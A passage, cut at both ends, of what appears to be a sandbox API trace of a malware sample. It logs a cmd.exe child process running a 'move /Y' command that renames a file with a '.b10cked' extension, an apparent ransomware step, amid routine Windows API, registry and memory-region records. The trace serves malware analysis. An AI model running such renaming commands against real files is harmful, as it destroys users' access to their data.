2 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) 
returned 3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.313] 
_wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.313] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.313] _wcsicmp (_String1="nslist.hxl", _String2=".") returned 64 [0202.313] _wcsicmp (_String1="nslist.hxl", _String2="..") returned 64 [0202.313] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl" (normalized: "c:\\users\\alluse~1\\micros~2\\nslist.hxl")) returned 0x2022 [0202.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1d38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.313] SetErrorMode (uMode=0x0) returned 0x0 [0202.313] SetErrorMode (uMode=0x1) returned 0x0 [0202.314] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", nBufferLength=0x104, lpBuffer=0x16eecc, lpFilePart=0x16eeb4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", lpFilePart=0x16eeb4*="nslist.hxl") returned 0x25 [0202.314] SetErrorMode (uMode=0x0) returned 0x1 [0202.314] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.314] _wcsicmp (_String1="nslist.hxl", _String2=".") returned 64 [0202.314] _wcsicmp (_String1="nslist.hxl", _String2="..") returned 64 [0202.314] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl" (normalized: "c:\\users\\alluse~1\\micros~2\\nslist.hxl")) returned 0x2022 [0202.314] SetErrorMode (uMode=0x0) returned 0x0 [0202.314] SetErrorMode (uMode=0x1) returned 0x0 
[0202.314] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", nBufferLength=0x104, lpBuffer=0x16f348, lpFilePart=0x16f0e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", lpFilePart=0x16f0e0*="nslist.hxl") returned 0x25 [0202.314] SetErrorMode (uMode=0x0) returned 0x1 [0202.314] SetErrorMode (uMode=0x0) returned 0x0 [0202.314] SetErrorMode (uMode=0x1) returned 0x0 [0202.314] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked", nBufferLength=0x104, lpBuffer=0x16f550, lpFilePart=0x16f0e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked", lpFilePart=0x16f0e0*="nslist.hxl.b10cked") returned 0x2d [0202.314] SetErrorMode (uMode=0x0) returned 0x1 [0202.314] SetLastError (dwErrCode=0x0) [0202.314] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\nslist.hxl.b10cked")) returned 0xffffffff [0202.314] GetLastError () returned 0x2 [0202.314] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x16ea5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ea5c) returned 0x2a0ed0 [0202.315] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x16ea5c | out: lpFindFileData=0x16ea5c) returned 0 [0202.315] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.315] GetLastError () returned 0x12 [0202.315] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x16ea5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ea5c) returned 0x2a0ed0 [0202.315] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x16ea5c | out: lpFindFileData=0x16ea5c) returned 0 [0202.315] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.315] GetLastError () returned 0x12 [0202.316] FindFirstFileExW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x2b1ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ad8) returned 0x2a0ed0 [0202.316] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x2b1ad8 | out: lpFindFileData=0x2b1ad8) returned 0 [0202.316] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.316] GetLastError () returned 0x12 [0202.316] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x2b1ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ad8) returned 0x2a0ed0 [0202.316] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x2b1ad8 | out: lpFindFileData=0x2b1ad8) returned 0 [0202.316] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.316] GetLastError () returned 0x12 [0202.317] _get_osfhandle (_FileHandle=2) returned 0xb [0202.317] GetFileType (hFile=0xb) returned 0x2 [0202.317] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.317] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16ec2c | out: lpMode=0x16ec2c) returned 1 [0202.317] _get_osfhandle (_FileHandle=2) returned 0xb [0202.317] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x16ec60 | out: lpConsoleScreenBufferInfo=0x16ec60) returned 1 [0202.588] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.588] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16eca0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.589] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x16ec84, 
lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ec84*=0x2c) returned 1 [0202.589] longjmp () [0202.589] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.589] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.589] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.589] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.589] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.589] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.589] SetConsoleInputExeNameW () returned 0x1 [0202.589] GetConsoleOutputCP () returned 0x1b5 [0202.589] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.589] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.590] exit (_Code=1) Process: id = "487" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16be0" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29481 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29482 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 29483 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29484 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 29485 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29486 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29487 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29488 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29489 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29490 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29878 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29879 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29880 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 29881 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 29882 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 29883 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29884 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29885 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29886 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29887 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29888 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29889 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29890 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29891 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29892 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 29893 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29894 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29895 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29896 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29897 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29898 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29899 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 29900 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 29901 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" 
Thread: id = 684 os_tid = 0xfc8 [0202.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa54 | out: lpSystemTimeAsFileTime=0x20fa54*(dwLowDateTime=0xad74f140, dwHighDateTime=0x1d440a9)) [0202.406] GetCurrentProcessId () returned 0xd30 [0202.406] GetCurrentThreadId () returned 0xfc8 [0202.406] GetTickCount () returned 0x39201 [0202.406] QueryPerformanceCounter (in: lpPerformanceCount=0x20fa4c | out: lpPerformanceCount=0x20fa4c*=25919529195) returned 1 [0202.407] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.407] __set_app_type (_Type=0x1) [0202.407] __p__fmode () returned 0x76b331f4 [0202.407] __p__commode () returned 0x76b331fc [0202.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.407] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.407] GetCurrentThreadId () returned 0xfc8 [0202.407] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc8) returned 0x38 [0202.407] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.407] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.407] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f9e4 | out: phkResult=0x20f9e4*=0x0) returned 0x2 [0202.407] VirtualQuery (in: lpAddress=0x20fa1b, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.407] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f9b4, 
dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.407] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.407] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.408] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0202.408] GetConsoleOutputCP () returned 0x1b5 [0202.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.408] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.408] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.408] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.408] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.408] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.408] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.408] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.408] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.409] GetEnvironmentStringsW () returned 0x270190* [0202.409] FreeEnvironmentStringsW (penv=0x270190) returned 1 [0202.409] 
GetEnvironmentStringsW () returned 0x270190* [0202.409] FreeEnvironmentStringsW (penv=0x270190) returned 1 [0202.409] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e954 | out: phkResult=0x20e954*=0x40) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0xb8, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x0, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] 
RegCloseKey (hKey=0x40) returned 0x0 [0202.409] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e954 | out: phkResult=0x20e954*=0x40) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x0, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x9, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x9, lpcbData=0x20e958*=0x4) returned 0x0 [0202.410] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x9, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.410] RegCloseKey (hKey=0x40) returned 0x0 [0202.410] time (in: timer=0x0 | out: 
timer=0x0) returned 0x5b8863a4 [0202.410] srand (_Seed=0x5b8863a4) [0202.410] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"" [0202.410] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"" [0202.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.410] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.410] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.410] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.410] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.410] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.410] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.410] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.410] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.410] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.410] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.410] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.410] SetEnvironmentVariableW (lpName="PROMPT", 
